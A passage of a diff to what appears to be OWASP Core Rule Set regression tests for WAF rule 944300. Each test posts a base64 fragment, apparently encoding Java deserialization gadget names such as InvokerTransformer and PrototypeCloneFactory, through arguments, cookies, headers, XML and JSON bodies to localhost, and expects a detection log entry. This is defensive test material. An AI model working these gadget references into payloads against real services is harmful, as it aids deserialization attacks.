80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-228 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 228 desc: "Nested XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-229 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 229 desc: "Content-Type text/plain includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-230 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 230 desc: "Content-Type application/json arg value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-231 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_id: 231 desc: "Content-Type application/json arg name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-232 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 232 desc: "Argument test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-233 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 233 desc: "Argument name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-234 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_id: 234 desc: "Cookie test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-235 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 235 desc: "Cookie name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-236 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 236 desc: "Request header test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvdG90eXBlY2xvbmVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-237 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 237 desc: "XML attribute value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-238 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 238 desc: "XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-239 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 239 desc: "Nested XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-240 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 240 desc: "Content-Type text/plain includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-241 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 241 desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-242 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_id: 242 desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-243 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 243 desc: "Argument test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-244 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_id: 244 desc: "Argument name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-245 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_id: 245 desc: "Cookie test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-246 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 246 desc: "Cookie name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-247 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 247 desc: "Request header test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-248 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 248 desc: "XML attribute value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-249 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 249 desc: "XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-250 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_id: 250 desc: "Nested XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-251 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_id: 251 desc: "Content-Type text/plain includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-252 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_id: 252 desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-253 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + 